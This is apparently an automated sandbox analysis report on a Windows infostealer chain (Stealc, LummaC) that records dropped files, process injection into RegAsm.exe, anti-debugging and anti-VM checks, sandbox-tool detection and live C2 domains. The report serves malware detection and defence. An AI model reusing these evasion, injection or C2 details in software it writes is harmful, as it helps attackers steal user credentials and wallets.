Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1001507001\1bd0484d71.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ZWAE2K096DYFL3DZL5I.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CC7V0PUTO3B4JOR1523VPRJQN904A.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

API coverage: 5.7 %

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3604	Thread sleep count: 716 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3604	Thread sleep time: -1432716s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6104	Thread sleep count: 1160 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6104	Thread sleep time: -2321160s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4136	Thread sleep time: -44000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5544	Thread sleep count: 111 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5544	Thread sleep time: -3330000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804	Thread sleep count: 978 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5804	Thread sleep time: -1956978s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 772	Thread sleep count: 1140 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 772	Thread sleep time: -2281140s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3868	Thread sleep count: 1143 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3868	Thread sleep time: -2287143s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1704	Thread sleep count: 1155 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1704	Thread sleep time: -2311155s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5436	Thread sleep count: 1179 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5436	Thread sleep time: -2359179s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6840	Thread sleep count: 1135 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 6840	Thread sleep time: -2271135s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2232	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 5940	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe TID: 5940	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe TID: 5000	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6848	Thread sleep count: 1203 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6848	Thread sleep time: -2407203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6876	Thread sleep count: 1188 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6876	Thread sleep time: -2377188s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6844	Thread sleep count: 1169 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6844	Thread sleep time: -2339169s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6192	Thread sleep time: -44000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6320	Thread sleep time: -330000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6868	Thread sleep count: 1203 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6868	Thread sleep time: -2407203s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6800	Thread sleep count: 1230 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6800	Thread sleep time: -2461230s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6864	Thread sleep count: 1168 > 30
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe TID: 6864	Thread sleep time: -2337168s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe TID: 2308	Thread sleep time: -30000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2948	Thread sleep time: -4920000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 3288	Thread sleep time: -360000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2720	Thread sleep time: -180000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 2948	Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe TID: 5084	Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe TID: 6108	Thread sleep time: -30000s >= -30000s

Source: C:\Users\user\AppData\Local\Temp\1000828001\new_v8.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\file.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,	6_2_00F1E430
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F24910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F24910
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F116D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F116D0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F1F6B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F23EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,	6_2_00F23EA0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,	6_2_00F1DA80
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,	6_2_00F1BE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F238B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,	6_2_00F238B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F24570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,	6_2_00F24570
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,	6_2_00F1ED20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F1DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,	6_2_00F1DE10
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_004062D5 FindFirstFileW,FindClose,	9_2_004062D5
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_00402E18 FindFirstFileW,	9_2_00402E18
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	Code function: 9_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	9_2_00406C9B

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F11160 GetSystemInfo,ExitProcess,

6_2_00F11160

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 30000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread delayed: delay time: 180000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Thread delayed: delay time: 30000

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.1730081745.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, axplong.exe, 00000001.00000002.1758480704.0000000000A32000.00000040.00000001.01000000.00000007.sdmp, new_v8.exe, 0000001B.00000003.3578559500.0000000004363000.00000004.00000800.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3151614668.0000000000764000.00000040.00000001.01000000.0000001D.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.1700960401.00000000006AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: stealc_default2.exe, 00000006.00000002.2615206943.00000000017B0000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp, stealc_default2.exe, 00000006.00000002.2615206943.00000000017D1000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3197330580.000000000128C000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3426441376.000000000128C000.00000004.00000020.00020000.00000000.sdmp, c1a4d3220c.exe, 00000021.00000003.3148528207.000000000128C000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3420299008.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, GOLD1234.exe, 00000025.00000003.3234339463.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3155168475.0000000000F74000.00000004.00000020.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3155168475.0000000000FA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: f6f4816752.exe, 00000031.00000002.3155168475.0000000000F2E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: shop.exe, 00000032.00000003.3571302943.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3237340411.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000002.3574945711.00000000015F0000.00000004.00000020.00020000.00000000.sdmp, shop.exe, 00000032.00000003.3365556478.00000000015F0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW9
Source: stealc_default2.exe, 00000006.00000002.2615206943.000000000176E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareW
Source: file.exe, 00000000.00000002.1730081745.0000000000EC2000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000001.00000002.1758480704.0000000000A32000.00000040.00000001.01000000.00000007.sdmp, new_v8.exe, 0000001B.00000003.3578559500.0000000004363000.00000004.00000800.00020000.00000000.sdmp, f6f4816752.exe, 00000031.00000002.3151614668.0000000000764000.00000040.00000001.01000000.0000001D.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-90077
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-91252
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-90074
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-90088
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-90094
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-90095
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-89916
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	API call chain: ExitProcess graph end node	graph_6-90117

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Thread information set: HideFromDebugger

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000857001\c1a4d3220c.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1001506001\f6f4816752.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_04B50B29 rdtsc

0_2_04B50B29

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F2AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00F2AD48

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F145C0 VirtualProtect ?,00000004,00000100,00000000

6_2_00F145C0

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

6_2_00F29860

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F29750 mov eax, dword ptr fs:[00000030h]

6_2_00F29750

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Code function: 6_2_00F278E0 GetProcessHeap,HeapAlloc,GetComputerNameA,

6_2_00F278E0

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F2AD48 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00F2AD48
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F2CEEA SetUnhandledExceptionFilter,	6_2_00F2CEEA
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_00F2B33A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00F2B33A
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF8B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6BF8B1F7
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6BF8B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6BF8B66C
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 6_2_6C13AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6C13AC62

Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: stealc_default2.exe PID: 6660, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: f6f4816752.exe PID: 5472, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000833001\dac4554719.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe	Memory written: C:\Users\user\AppData\Local\Temp\1000965001\GOLD1234.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe	Memory written: C:\Users\user\AppData\Local\Temp\1001425001\shop.exe base: 400000 value starts with: 4D5A

LummaC encrypted strings found

Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: scriptyprefej.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: navygenerayk.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: founpiuer.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: necklacedmny.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: thumbystriw.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: fadehairucw.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: crisiwarny.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: presticitpo.store
Source: c1a4d3220c.exe, 00000021.00000003.2810274920.0000000004DF0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: opinieni.store
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: servicedny.site
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: authorisev.site
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: faulteyotk.site
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dilemmadu.site
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: contemteny.site
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: goalyfeastz.site
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: opposezmny.site
Source: GOLD1234.exe, 00000022.00000002.3206884173.0000000000E5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: seallysl.site
